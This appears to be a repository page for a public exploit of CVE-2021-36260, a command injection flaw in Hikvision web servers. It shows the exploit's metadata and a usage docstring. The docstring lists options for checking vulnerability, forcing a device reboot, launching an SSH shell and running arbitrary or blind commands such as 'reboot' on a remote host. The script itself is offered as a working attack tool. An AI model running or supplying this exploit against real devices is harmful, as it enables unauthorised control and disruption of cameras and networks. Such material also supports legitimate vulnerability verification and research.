Projects STRLCPY CVE-2021-36260 Files
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command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.

Exploit Title: Hikvision Web Server Build 210702 - Command Injection

Exploit Author: bashis

Vendor Homepage:

Version: 1.0

CVE: CVE-2021-36260


All credit to Watchful_IP

#!/usr/bin/env python3

""" Note:

  1. This code will not verify if remote is Hikvision device or not.
  2. Most of my interest in this code has been concentrated on how to reliably detect vulnerable and/or exploitable devices. Some devices are easy to detect, verify and exploit the vulnerability, other devices may be vulnerable but not so easy to verify and exploit. I think the combined verification code should have very high accuracy.
  3. 'safe check' (--check) will try write and read for verification 'unsafe check' (--reboot) will try reboot the device for verification

[Examples] Safe vulnerability/verify check: $./ --rhost --rport 8080 --check

Safe and unsafe vulnerability/verify check: (will only use 'unsafe check' if not verified with 'safe check') $./ --rhost --rport 8080 --check --reboot

Unsafe vulnerability/verify check: $./ --rhost --rport 8080 --reboot

Launch and connect to SSH shell: $./ --rhost --rport 8080 --shell

Execute command: $./ --rhost --rport 8080 --cmd "ls -l"

Execute blind command: $./ --rhost --rport 8080 --cmd_blind "reboot"

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